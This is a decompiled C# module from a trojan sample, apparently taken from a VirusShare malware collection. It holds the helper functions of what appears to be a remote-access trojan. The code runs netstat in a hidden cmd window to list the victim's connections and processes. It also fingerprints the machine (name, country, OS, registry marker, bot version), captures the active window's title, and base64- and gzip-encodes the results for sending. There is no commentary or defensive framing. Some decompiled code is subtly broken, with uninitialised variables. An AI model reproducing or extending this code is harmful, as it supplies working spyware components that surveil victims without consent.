// Decompiled with JetBrains decompiler // Type: n.API // Assembly: n, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: BFCF94BC-F711-4A63-941E-52FC7F306AC7 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Fsysna.wh-0adec5f2e37dcb28180512f882c1aec3a7f939bf33e4147587c7b7277719444b.exe using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using Microsoft.VisualBasic.MyServices; using n.My; using System; using System.Collections; using System.Diagnostics; using System.IO; using System.IO.Compression; using System.Runtime.InteropServices; using System.Text; namespace n { [StandardModule] internal sealed class API { private const uint LOCALE_SYSTEM_DEFAULT = 1024; private const uint LOCALE_SABBREVCTRYNAME = 7; public static string fx(ref Array A) { string str1; try { foreach (object obj in A) { string str2 = Conversions.ToString(obj); bool flag; if (Strings.InStr(str2, "Local Address") > 0) flag = true; else if (flag) { string str3; if (Operators.CompareString(str2, "", false) == 0) { str1 = Strings.Mid(str3, 1, str3.Length - 1); break; } do { str2 = Strings.Replace(str2, " ", " "); } while (Strings.InStr(str2, " ") > 0); string[] strArray = Strings.Split(str2); string str4; try { str4 = Strings.Split(Process.GetProcessById(Conversions.ToInteger(strArray[5])).MainModule.FileName, "\\")[Strings.Split(Process.GetProcessById(Conversions.ToInteger(strArray[5])).MainModule.FileName, "\\").Length - 1] + ":" + strArray[5]; } catch (Exception ex) { ProjectData.SetProjectError(ex); str4 = Process.GetProcessById(Conversions.ToInteger(strArray[5])).ProcessName + ":" + strArray[5]; ProjectData.ClearProjectError(); } str3 = str3 + str4 + "," + strArray[1] + "," + strArray[2] + "," + strArray[3].ToLower().Replace(MyProject.Computer.Name.ToLower(), "127.0.0.1") + "," + strArray[4] + "!"; } } } finally { IEnumerator enumerator; if (enumerator is IDisposable) (enumerator as IDisposable).Dispose(); } return str1; } public static string Gt() { Process process = Process.Start(new ProcessStartInfo() { UseShellExecute = false, RedirectStandardError = true, RedirectStandardInput = true, RedirectStandardOutput = true, WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, FileName = "cmd" }); process.StandardInput.WriteLine("netstat -o"); process.StandardInput.WriteLine("exit"); StreamReader streamReader = new StreamReader(process.StandardOutput.BaseStream); Array A = (Array) Strings.Split(process.StandardOutput.ReadToEnd(), "\r\n"); return API.fx(ref A); } public static byte[] ZIP(byte[] Byt, ref bool Compress) { if (Compress) { MemoryStream memoryStream = new MemoryStream(); GZipStream gzipStream = new GZipStream((Stream) memoryStream, CompressionMode.Compress, true); gzipStream.Write(Byt, 0, Byt.Length); gzipStream.Dispose(); memoryStream.Position = 0L; byte[] buffer = new byte[(int) memoryStream.Length + 1]; memoryStream.Read(buffer, 0, buffer.Length); memoryStream.Dispose(); return buffer; } MemoryStream memoryStream1 = new MemoryStream(Byt); GZipStream gzipStream1 = new GZipStream((Stream) memoryStream1, CompressionMode.Decompress); byte[] buffer1 = new byte[4]; memoryStream1.Position = memoryStream1.Length - 5L; memoryStream1.Read(buffer1, 0, 4); int int32 = BitConverter.ToInt32(buffer1, 0); memoryStream1.Position = 0L; byte[] array = new byte[int32 - 1 + 1]; gzipStream1.Read(array, 0, int32); gzipStream1.Dispose(); memoryStream1.Dispose(); return array; } public static string FEN(byte[] data) => Convert.ToBase64String(data); public static byte[] FDE(string base64) => Convert.FromBase64String(base64); public static string ENB(ref string s) => Convert.ToBase64String(Encoding.UTF8.GetBytes(s)); public static string DEB(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s)); [DllImport("kernel32.dll")] private static extern int GetLocaleInfo( uint Locale, uint LCType, [Out] StringBuilder lpLCData, int cchData); private static string Gcc(uint lInfo) { StringBuilder lpLCData = new StringBuilder(256); int localeInfo = API.GetLocaleInfo(1024U, lInfo, lpLCData, lpLCData.Capacity); return localeInfo > 0 ? lpLCData.ToString().Substring(0, localeInfo - 1) : string.Empty; } public static string Gc() => API.Gcc(7U); public static string A0() { RegistryProxy registry = MyProject.Computer.Registry; string str1 = B.PC + "\r\n"; string str2; try { str2 = str1 + API.Gc() + "\r\n"; } catch (Exception ex) { ProjectData.SetProjectError(ex); str2 = str1 + "X\r\n"; ProjectData.ClearProjectError(); } string str3; try { str3 = str2 + MyProject.Computer.Info.OSFullName + "\r\n"; } catch (Exception ex) { ProjectData.SetProjectError(ex); str3 = str2 + "X\r\n"; ProjectData.ClearProjectError(); } string str4; try { foreach (string valueName in MyProject.Computer.Registry.CurrentUser.GetValueNames()) { if (Operators.CompareString(valueName, "p", false) == 0) { str4 = str3 + "Yes\r\n"; goto label_12; } } } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } str4 = str3 + "No\r\n"; label_12: string Expression = str4 + B.ver; string str5; try { str5 = Strings.Replace(Strings.Replace(Strings.Replace(Expression, "Microsoft", ""), "Windows", "Win").Replace("®", "").Replace("™", ""), " ", " "); } catch (Exception ex) { ProjectData.SetProjectError(ex); str5 = Expression + "X\r\n"; ProjectData.ClearProjectError(); } return str5 + "\r\n \r\n "; } [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)] public static extern IntPtr GetForegroundWindow(); [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern int GetWindowThreadProcessId(IntPtr hwnd, ref int lpdwProcessID); [DllImport("user32.dll", EntryPoint = "GetWindowTextA", CharSet = CharSet.Ansi, SetLastError = true)] private static extern int GetWindowText(IntPtr hWnd, [MarshalAs(UnmanagedType.VBByRefStr)] ref string WinTitle, int MaxLength); [DllImport("user32.dll", EntryPoint = "GetWindowTextLengthA", CharSet = CharSet.Ansi, SetLastError = true)] private static extern int GetWindowTextLength(long hwnd); public static string A1(ref bool p) { string str1; try { IntPtr foregroundWindow = API.GetForegroundWindow(); if (foregroundWindow == IntPtr.Zero) { str1 = ""; } else { int windowTextLength = API.GetWindowTextLength((long) foregroundWindow); string str2 = Strings.StrDup(windowTextLength + 1, "*"); API.GetWindowText(foregroundWindow, ref str2, windowTextLength + 1); int lpdwProcessID; API.GetWindowThreadProcessId(foregroundWindow, ref lpdwProcessID); if (lpdwProcessID == 0) { str1 = API.ENB(ref str2); } else { try { string mainWindowTitle = Process.GetProcessById(lpdwProcessID).MainWindowTitle; str1 = API.ENB(ref mainWindowTitle); } catch (Exception ex) { ProjectData.SetProjectError(ex); str1 = API.ENB(ref str2); ProjectData.ClearProjectError(); } } } } catch (Exception ex) { ProjectData.SetProjectError(ex); str1 = ""; ProjectData.ClearProjectError(); } return str1; } public class wd { public const int HIDE = 0; public const int Normal = 1; public const int Minimized = 2; public const int Maximized = 3; public const int Show = 5; public const int RESTORE = 9; public int hWnd; public static void G(ref int hwd, ref int A) => API.wd.ShowWindow(hwd, A); [DllImport("User32")] public static extern int ShowWindow(int hwnd, int nCmdShow); } } }